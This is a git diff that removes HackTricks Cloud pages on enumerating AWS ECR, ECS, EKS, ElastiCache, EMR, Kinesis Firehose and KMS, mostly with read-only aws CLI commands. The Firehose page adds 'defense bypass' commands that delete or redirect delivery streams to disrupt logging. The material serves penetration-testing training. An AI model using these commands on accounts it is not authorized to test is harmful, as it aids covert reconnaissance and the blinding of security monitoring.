- * The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo. - -2. **Public Registries**: - -* **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.** - * The URI of a **public repository** is like `public.ecr.aws//`. Although the `` part can be changed by the admin to another string easier to remember. - -**Repositories** - -These are the **images** that in the **private registry** or to the **public** one. - -{% hint style="info" %} -Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**. -{% endhint %} - -#### Registry & Repository Policies - -**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image: - -
- -#### Enumeration - -{% code overflow="wrap" %} -```bash -# Get repos -aws ecr describe-repositories -aws ecr describe-registry - -# Get image metadata -aws ecr list-images --repository-name -aws ecr describe-images --repository-name -aws ecr describe-image-replication-status --repository-name --image-id -aws ecr describe-image-scan-findings --repository-name --image-id -aws ecr describe-pull-through-cache-rules --repository-name --image-id - -# Get public repositories -aws ecr-public describe-repositories - -# Get policies -aws ecr get-registry-policy -aws ecr get-repository-policy --repository-name -``` -{% endcode %} - -#### Unauthenticated Enum - -{% content-ref url="../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md" %} -[aws-ecr-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md) -{% endcontent-ref %} - -#### Privesc - -In the following page you can check how to **abuse ECR permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-ecr-privesc.md" %} -[aws-ecr-privesc.md](../aws-privilege-escalation/aws-ecr-privesc.md) -{% endcontent-ref %} - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %} -[aws-ecr-post-exploitation.md](../aws-post-exploitation/aws-ecr-post-exploitation.md) -{% endcontent-ref %} - -#### Persistence - -{% content-ref url="../aws-persistence/aws-ecr-persistence.md" %} -[aws-ecr-persistence.md](../aws-persistence/aws-ecr-persistence.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
deleted file mode 100644
index 198b4e856..000000000
--- a/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md
+++ /dev/null
@@ -1,108 +0,0 @@
-# AWS - ECS Enum
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## ECS - -### Basic Information - -Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**. - -ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**. - -* **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”. -* **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups. - * There **2 types of applications**: - * **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application. - * **Task**: A standalone task that runs and terminates. For example, a batch job. - * Among the service applications, there are **2 types of service schedulers**: - * [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node. 
- * [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies. -* **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**... - * Check **env variables for sensitive info**! - -### Sensitive Data In Task Definitions - -Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within. - -Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions. - -### Enumeration - -```bash -# Clusters info -aws ecs list-clusters -aws ecs describe-clusters --clusters - -# Container instances -## An Amazon ECS container instance is an Amazon EC2 instance that is running the Amazon ECS container agent and has been registered into an Amazon ECS cluster. 
-aws ecs list-container-instances --cluster -aws ecs describe-container-instances --cluster --container-instances - -# Services info -aws ecs list-services --cluster -aws ecs describe-services --cluster --services -aws ecs describe-task-sets --cluster --service - -# Task definitions -aws ecs list-task-definition-families -aws ecs list-task-definitions -aws ecs list-tasks --cluster -aws ecs describe-tasks --cluster --tasks -## Look for env vars and secrets used from the task definition -aws ecs describe-task-definition --task-definition : -``` - -### Unauthenticated Access - -{% content-ref url="../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md" %} -[aws-ecs-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md) -{% endcontent-ref %} - -### Privesc - -In the following page you can check how to **abuse ECS permissions to escalate privileges**: - -{% content-ref url="../aws-privilege-escalation/aws-ecs-privesc.md" %} -[aws-ecs-privesc.md](../aws-privilege-escalation/aws-ecs-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-ecs-post-exploitation.md" %} -[aws-ecs-post-exploitation.md](../aws-post-exploitation/aws-ecs-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-ecs-persistence.md" %} -[aws-ecs-persistence.md](../aws-persistence/aws-ecs-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md deleted file mode 100644 index b99caa683..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md +++ /dev/null @@ -1,72 +0,0 @@ -# AWS - EKS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EKS - -Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS. - -Key aspects of Amazon EKS include: - -1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates. -2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security. -3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design. -4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment. - -#### Enumeration - -```bash -aws eks list-clusters -aws eks describe-cluster --name -# Check for endpointPublicAccess and publicAccessCidrs - -aws eks list-fargate-profiles --cluster-name -aws eks describe-fargate-profile --cluster-name --fargate-profile-name - -aws eks list-identity-provider-configs --cluster-name -aws eks describe-identity-provider-config --cluster-name --identity-provider-config - -aws eks list-nodegroups --cluster-name -aws eks describe-nodegroup --cluster-name --nodegroup-name - -aws eks list-updates --name -aws eks describe-update --name --update-id -``` - -#### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-eks-post-exploitation.md" %} -[aws-eks-post-exploitation.md](../aws-post-exploitation/aws-eks-post-exploitation.md) -{% endcontent-ref %} - -## References - -* [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert 
(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/pentesting-cloud/aws-security/aws-services/aws-elasticache.md deleted file mode 100644 index 8839a6598..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-elasticache.md +++ /dev/null @@ -1,71 +0,0 @@ -# AWS - ElastiCache - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ElastiCache - -AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**. - -### Enumeration - -```bash -# ElastiCache clusters -## Check the SecurityGroups to later check who can access -## In Redis clusters: Check AuthTokenEnabled to see if you need password -## In memcache clusters: You can find the URL to connect -aws elasticache describe-cache-clusters - -# List all ElastiCache replication groups -## Find here the accesible URLs for Redis clusters -aws elasticache describe-replication-groups - -#List all ElastiCache parameter groups -aws elasticache describe-cache-parameter-groups - -#List all ElastiCache security groups -## If this gives an error it's because it's using SGs from EC2 -aws elasticache describe-cache-security-groups - -#List all ElastiCache subnet groups -aws elasticache describe-cache-subnet-groups - -# Get snapshots -aws elasticache describe-snapshots - -# Get users and groups -aws elasticache describe-user-groups -aws elasticache describe-users - -# List ElastiCache events -aws elasticache describe-events -``` - -### Privesc (TODO) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md deleted file mode 100644 index be430d055..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md +++ /dev/null @@ -1,86 +0,0 @@ -# AWS - EMR Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EMR - -AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark. - -Key characteristics include: - -* **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features: - * **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider. - * **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop: - * Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer. - * HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm. -* **Encryption in Transit**: Focuses on securing data during transfer. Options include: - * **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider: - * **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket. - * **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts. - -Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version: - -* **Hadoop**: - * Might reduce encrypted shuffle using TLS. - * Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption. -* **Presto** (EMR version 5.6.0+): - * Internal communication between Presto nodes is secured using SSL and TLS. 
-* **Tez Shuffle Handler**: - * Utilizes TLS for encryption. -* **Spark**: - * Employs TLS for the Akka protocol. - * Uses Simple Authentication Security Layer and 3DES for Block Transfer Service. - * External shuffle service is secured with the Simple Authentication Security Layer. - -These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases. - -#### Enumeration - -```bash -aws emr list-clusters -aws emr describe-cluster --cluster-id -aws emr list-instances --cluster-id -aws emr list-instance-fleets --cluster-id -aws emr list-steps --cluster-id -aws emr list-notebook-executions -aws emr list-security-configurations -aws emr list-studios #Get studio URLs -``` - -#### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-emr-privesc.md" %} -[aws-emr-privesc.md](../aws-privilege-escalation/aws-emr-privesc.md) -{% endcontent-ref %} - -## References - -* [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md deleted file mode 100644 index 34909d625..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md +++ /dev/null @@ -1,77 +0,0 @@ -# AWS - Kinesis Data Firehose Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Kinesis Data Firehose - -Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints. - -The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases. - -### Enumeration - -```bash -# Get delivery streams -aws firehose list-delivery-streams - -# Get stream info -aws firehose describe-delivery-stream --delivery-stream-name -## Get roles -aws firehose describe-delivery-stream --delivery-stream-name | grep -i RoleARN -``` - -## Post-exploitation / Defense Bypass - -In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly. 
- -### firehose:DeleteDeliveryStream - -``` -aws firehose delete-delivery-stream --delivery-stream-name --allow-force-delete -``` - -### firehose:UpdateDestination - -``` -aws firehose update-destination --delivery-stream-name --current-delivery-stream-version-id --destination-id -``` - -### firehose:PutRecord | firehose:PutRecordBatch - -``` -aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}' - -aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json -``` - -## References - -* [https://docs.amazonaws.cn/en\_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md deleted file mode 100644 index f1b5c3bdf..000000000 --- a/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md +++ /dev/null @@ -1,183 +0,0 @@ -# AWS - KMS Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## KMS - Key Management Service - -AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys. - -KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**. - -KMS is a **region specific service**. - -**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. - -**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data. - -A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK. - -There are 2 types of master keys: - -* **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it. 
-* **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys. - -**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. - -### Key Policies - -These defines **who can use and access a key in KMS**. - -By **default:** - -* It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM. - - Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one. - - * Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work. -* It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy. - - **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective. -* It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted. - -**Default policy** example: - -```json -{ - "Sid": "Enable IAM policies", - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::111122223333:root" - }, - "Action": "kms:*", - "Resource": "*" -} -``` - -{% hint style="warning" %} -If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**. -{% endhint %} - -
- -Policy Details - -Properties of a policy: - -* JSON based document -* Resource --> Affected resources (can be "\*") -* Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions) -* Effect --> Allow/Deny -* Principal --> arn affected -* Conditions (optional) --> Condition to give the permissions - -Grants: - -* Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...) -* After the grant is created a GrantToken and a GratID are issued - -**Access**: - -* Via **key policy** -- If this exist, this takes **precedent** over the IAM policy -* Via **IAM policy** -* Via **grants** - -
- -### Key Administrators - -Key administrator by default: - -* Have access to manage KMS but not to encrypt or decrypt data -* Only IAM users and roles can be added to Key Administrators list (not groups) -* If external CMK is used, Key Administrators have the permission to import key material - -### Rotation of CMKs - -* The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. -* **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed. -* **Older keys are retained** to decrypt data that was encrypted prior to the rotation -* In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. -* If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. - -#### Manual rotation - -* A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. -* To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. -* You need to **keep old keys to decrypt old files** encrypted with it. - -You can import keys from your on-premises key infrastructure . - -### Other relevant KMS information - -KMS is priced per number of encryption/decryption requests received from all services per month. - -KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. 
- -With KMS policy you can do the following: - -* Limit who can create data keys and which services have access to use these keys -* Limit systems access to encrypt only, decrypt only or both -* Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions). - -You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. - -### Enumeration - -```bash -aws kms list-keys -aws kms list-key-policies --key-id -aws kms list-grants --key-id -aws kms describe-key --key-id -aws kms get-key-policy --key-id --policy-name # Default policy name is "default" -aws kms describe-custom-key-stores -``` - -### Privesc - -{% content-ref url="../aws-privilege-escalation/aws-kms-privesc.md" %} -[aws-kms-privesc.md](../aws-privilege-escalation/aws-kms-privesc.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../aws-post-exploitation/aws-kms-post-exploitation.md" %} -[aws-kms-post-exploitation.md](../aws-post-exploitation/aws-kms-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../aws-persistence/aws-kms-persistence.md" %} -[aws-kms-persistence.md](../aws-persistence/aws-kms-persistence.md) -{% endcontent-ref %} - -## References - -* [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
